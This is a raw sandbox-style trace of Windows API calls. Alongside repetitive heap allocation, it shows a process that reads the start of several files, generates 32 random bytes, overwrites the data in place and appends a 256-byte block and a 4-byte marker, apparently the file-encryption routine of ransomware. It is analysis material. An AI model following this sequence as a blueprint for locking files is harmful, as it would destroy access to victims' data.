[0083.672] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0083.672] GetProcessHeap () returned 0x4f10000 [0083.672] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0083.672] GetProcessHeap () returned 0x4f10000 [0083.672] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0083.672] GetProcessHeap () returned 0x4f10000 [0083.672] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0083.672] GetProcessHeap () returned 0x4f10000 [0083.672] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0083.672] GetProcessHeap () returned 0x4f10000 [0083.672] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0083.672] GetProcessHeap () returned 0x4f10000 [0083.672] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.672] GetProcessHeap () returned 0x4f10000 [0083.672] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0083.672] GetProcessHeap () returned 0x4f10000 [0083.672] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.672] GetProcessHeap () returned 0x4f10000 [0083.672] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.672] GetProcessHeap () returned 0x4f10000 [0083.672] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.672] GetProcessHeap () returned 0x4f10000 [0083.672] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.672] GetProcessHeap () returned 0x4f10000 [0083.672] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.672] GetProcessHeap () returned 0x4f10000 [0083.672] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.672] GetProcessHeap () returned 0x4f10000 [0083.673] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.673] GetProcessHeap () returned 0x4f10000 [0083.673] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.673] GetProcessHeap () returned 0x4f10000 [0083.673] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.673] GetProcessHeap () returned 0x4f10000 [0083.673] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.673] GetProcessHeap () returned 0x4f10000 [0083.673] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.673] GetProcessHeap () returned 0x4f10000 [0083.673] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.673] GetProcessHeap () returned 0x4f10000 [0083.673] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.673] GetProcessHeap () returned 0x4f10000 [0083.673] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.673] GetProcessHeap () returned 0x4f10000 [0083.673] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.673] GetProcessHeap () returned 0x4f10000 [0083.673] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.673] GetProcessHeap () returned 0x4f10000 [0083.673] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.673] GetProcessHeap () returned 0x4f10000 [0083.673] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.673] GetProcessHeap () returned 0x4f10000 [0083.673] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.673] GetProcessHeap () returned 0x4f10000 [0083.673] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.673] GetProcessHeap () returned 0x4f10000 [0083.673] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.674] GetProcessHeap () returned 0x4f10000 [0083.674] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.674] GetProcessHeap () returned 0x4f10000 [0083.674] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.674] GetProcessHeap () returned 0x4f10000 [0083.674] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.674] GetProcessHeap () returned 0x4f10000 [0083.674] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0083.674] GetProcessHeap () returned 0x4f10000 [0083.674] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.674] GetProcessHeap () returned 0x4f10000 [0083.674] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0083.674] GetProcessHeap () returned 0x4f10000 [0083.674] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0083.674] GetProcessHeap () returned 0x4f10000 [0083.674] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0083.674] GetProcessHeap () returned 0x4f10000 [0083.674] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0083.674] SetFilePointerEx (in: hFile=0x954, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.674] WriteFile (in: hFile=0x954, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x84afd44*=0x100, lpOverlapped=0x0) returned 1 [0083.674] WriteFile (in: hFile=0x954, lpBuffer=0x84afd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x84afd48*, lpNumberOfBytesWritten=0x84afd44*=0x4, lpOverlapped=0x0) returned 1 [0083.674] GetProcessHeap () returned 0x4f10000 [0083.674] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b610d8 | out: hHeap=0x4f10000) returned 1 [0083.674] GetProcessHeap () returned 0x4f10000 [0083.674] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0083.674] GetProcessHeap () returned 0x4f10000 [0083.674] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0083.674] CloseHandle (hObject=0x954) returned 1 [0083.679] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 117 [0083.679] SetFilePointerEx (in: hFile=0x958, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.679] ReadFile (in: hFile=0x958, lpBuffer=0x84afd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x84afd4c*, lpNumberOfBytesRead=0x84afd08*=0x0, lpOverlapped=0x0) returned 1 [0083.679] SetFilePointerEx (in: hFile=0x958, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.679] GetProcessHeap () returned 0x4f10000 [0083.679] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0083.679] GetProcessHeap () returned 0x4f10000 [0083.679] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0083.679] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0083.679] GetProcessHeap () returned 0x4f10000 [0083.679] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b610d8 [0083.679] ReadFile (in: hFile=0x958, lpBuffer=0x8b610d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesRead=0x84afd08*=0x1000, lpOverlapped=0x0) returned 1 [0083.727] SetFilePointerEx (in: hFile=0x958, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.727] WriteFile (in: hFile=0x958, lpBuffer=0x8b610d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesWritten=0x84afd44*=0x1000, lpOverlapped=0x0) returned 1 [0083.728] GetProcessHeap () returned 0x4f10000 [0083.728] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0083.728] GetProcessHeap () returned 0x4f10000 [0083.728] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.728] GetProcessHeap () returned 0x4f10000 [0083.728] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0083.728] GetProcessHeap () returned 0x4f10000 [0083.728] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.728] GetProcessHeap () returned 0x4f10000 [0083.728] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0083.728] GetProcessHeap () returned 0x4f10000 [0083.728] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.728] GetProcessHeap () returned 0x4f10000 [0083.728] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.728] GetProcessHeap () returned 0x4f10000 [0083.728] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.728] GetProcessHeap () returned 0x4f10000 [0083.728] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.728] GetProcessHeap () returned 0x4f10000 [0083.728] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.728] GetProcessHeap () returned 0x4f10000 [0083.728] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.728] GetProcessHeap () returned 0x4f10000 [0083.728] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.728] GetProcessHeap () returned 0x4f10000 [0083.728] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.728] GetProcessHeap () returned 0x4f10000 [0083.728] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.728] GetProcessHeap () returned 0x4f10000 [0083.728] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.728] GetProcessHeap () returned 0x4f10000 [0083.728] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.729] GetProcessHeap () returned 0x4f10000 [0083.729] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.729] GetProcessHeap () returned 0x4f10000 [0083.729] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.729] GetProcessHeap () returned 0x4f10000 [0083.729] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.729] GetProcessHeap () returned 0x4f10000 [0083.729] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.729] GetProcessHeap () returned 0x4f10000 [0083.729] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.729] GetProcessHeap () returned 0x4f10000 [0083.729] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.729] GetProcessHeap () returned 0x4f10000 [0083.729] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.729] GetProcessHeap () returned 0x4f10000 [0083.729] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.729] GetProcessHeap () returned 0x4f10000 [0083.729] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.729] GetProcessHeap () returned 0x4f10000 [0083.729] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.729] GetProcessHeap () returned 0x4f10000 [0083.729] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.729] GetProcessHeap () returned 0x4f10000 [0083.729] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.729] GetProcessHeap () returned 0x4f10000 [0083.729] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.729] GetProcessHeap () returned 0x4f10000 [0083.729] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.729] GetProcessHeap () returned 0x4f10000 [0083.729] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.729] GetProcessHeap () returned 0x4f10000 [0083.729] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.729] GetProcessHeap () returned 0x4f10000 [0083.730] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.730] GetProcessHeap () returned 0x4f10000 [0083.730] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.730] GetProcessHeap () returned 0x4f10000 [0083.730] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.730] GetProcessHeap () returned 0x4f10000 [0083.730] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.730] GetProcessHeap () returned 0x4f10000 [0083.730] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.730] GetProcessHeap () returned 0x4f10000 [0083.730] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.730] GetProcessHeap () returned 0x4f10000 [0083.730] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0083.730] GetProcessHeap () returned 0x4f10000 [0083.730] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.730] GetProcessHeap () returned 0x4f10000 [0083.730] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0083.730] GetProcessHeap () returned 0x4f10000 [0083.730] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0083.730] GetProcessHeap () returned 0x4f10000 [0083.730] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0083.730] GetProcessHeap () returned 0x4f10000 [0083.730] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0083.730] GetProcessHeap () returned 0x4f10000 [0083.730] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0083.730] GetProcessHeap () returned 0x4f10000 [0083.730] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0083.730] GetProcessHeap () returned 0x4f10000 [0083.730] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.730] GetProcessHeap () returned 0x4f10000 [0083.731] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0083.731] GetProcessHeap () returned 0x4f10000 [0083.731] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.731] GetProcessHeap () returned 0x4f10000 [0083.731] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.731] GetProcessHeap () returned 0x4f10000 [0083.731] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.731] GetProcessHeap () returned 0x4f10000 [0083.731] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.731] GetProcessHeap () returned 0x4f10000 [0083.731] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.731] GetProcessHeap () returned 0x4f10000 [0083.731] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.731] GetProcessHeap () returned 0x4f10000 [0083.731] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.731] GetProcessHeap () returned 0x4f10000 [0083.731] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.731] GetProcessHeap () returned 0x4f10000 [0083.731] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.731] GetProcessHeap () returned 0x4f10000 [0083.731] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.731] GetProcessHeap () returned 0x4f10000 [0083.731] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.731] GetProcessHeap () returned 0x4f10000 [0083.731] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.731] GetProcessHeap () returned 0x4f10000 [0083.731] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.731] GetProcessHeap () returned 0x4f10000 [0083.732] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.732] GetProcessHeap () returned 0x4f10000 [0083.732] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.732] GetProcessHeap () returned 0x4f10000 [0083.732] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.732] GetProcessHeap () returned 0x4f10000 [0083.732] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.732] GetProcessHeap () returned 0x4f10000 [0083.732] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.732] GetProcessHeap () returned 0x4f10000 [0083.732] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.732] GetProcessHeap () returned 0x4f10000 [0083.732] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.732] GetProcessHeap () returned 0x4f10000 [0083.732] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.732] GetProcessHeap () returned 0x4f10000 [0083.732] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.732] GetProcessHeap () returned 0x4f10000 [0083.732] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.732] GetProcessHeap () returned 0x4f10000 [0083.732] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.732] GetProcessHeap () returned 0x4f10000 [0083.732] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0083.732] GetProcessHeap () returned 0x4f10000 [0083.732] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.732] GetProcessHeap () returned 0x4f10000 [0083.732] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0083.732] GetProcessHeap () returned 0x4f10000 [0083.732] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0083.732] GetProcessHeap () returned 0x4f10000 [0083.732] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0083.732] GetProcessHeap () returned 0x4f10000 [0083.733] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0083.733] SetFilePointerEx (in: hFile=0x958, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.733] WriteFile (in: hFile=0x958, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x84afd44*=0x100, lpOverlapped=0x0) returned 1 [0083.733] WriteFile (in: hFile=0x958, lpBuffer=0x84afd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x84afd48*, lpNumberOfBytesWritten=0x84afd44*=0x4, lpOverlapped=0x0) returned 1 [0083.733] GetProcessHeap () returned 0x4f10000 [0083.733] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b610d8 | out: hHeap=0x4f10000) returned 1 [0083.733] GetProcessHeap () returned 0x4f10000 [0083.733] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0083.733] GetProcessHeap () returned 0x4f10000 [0083.733] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0083.733] CloseHandle (hObject=0x958) returned 1 [0083.735] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 118 [0083.735] SetFilePointerEx (in: hFile=0x95c, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.735] ReadFile (in: hFile=0x95c, lpBuffer=0x84afd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x84afd4c*, lpNumberOfBytesRead=0x84afd08*=0x0, lpOverlapped=0x0) returned 1 [0083.735] SetFilePointerEx (in: hFile=0x95c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.735] GetProcessHeap () returned 0x4f10000 [0083.735] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0083.735] GetProcessHeap () returned 0x4f10000 [0083.735] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0083.735] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0083.735] GetProcessHeap () returned 0x4f10000 [0083.735] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b610d8 [0083.735] ReadFile (in: hFile=0x95c, lpBuffer=0x8b610d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesRead=0x84afd08*=0x1000, lpOverlapped=0x0) returned 1 [0083.783] SetFilePointerEx (in: hFile=0x95c, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.783] WriteFile (in: hFile=0x95c, lpBuffer=0x8b610d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesWritten=0x84afd44*=0x1000, lpOverlapped=0x0) returned 1 [0083.783] GetProcessHeap () returned 0x4f10000 [0083.783] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0083.783] GetProcessHeap () returned 0x4f10000 [0083.783] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.783] GetProcessHeap () returned 0x4f10000 [0083.784] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0083.784] GetProcessHeap () returned 0x4f10000 [0083.784] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.784] GetProcessHeap () returned 0x4f10000 [0083.784] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0083.784] GetProcessHeap () returned 0x4f10000 [0083.784] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.784] GetProcessHeap () returned 0x4f10000 [0083.784] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.784] GetProcessHeap () returned 0x4f10000 [0083.784] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.784] GetProcessHeap () returned 0x4f10000 [0083.784] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.784] GetProcessHeap () returned 0x4f10000 [0083.784] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.784] GetProcessHeap () returned 0x4f10000 [0083.784] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.784] GetProcessHeap () returned 0x4f10000 [0083.784] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.784] GetProcessHeap () returned 0x4f10000 [0083.784] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.784] GetProcessHeap () returned 0x4f10000 [0083.784] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.784] GetProcessHeap () returned 0x4f10000 [0083.784] 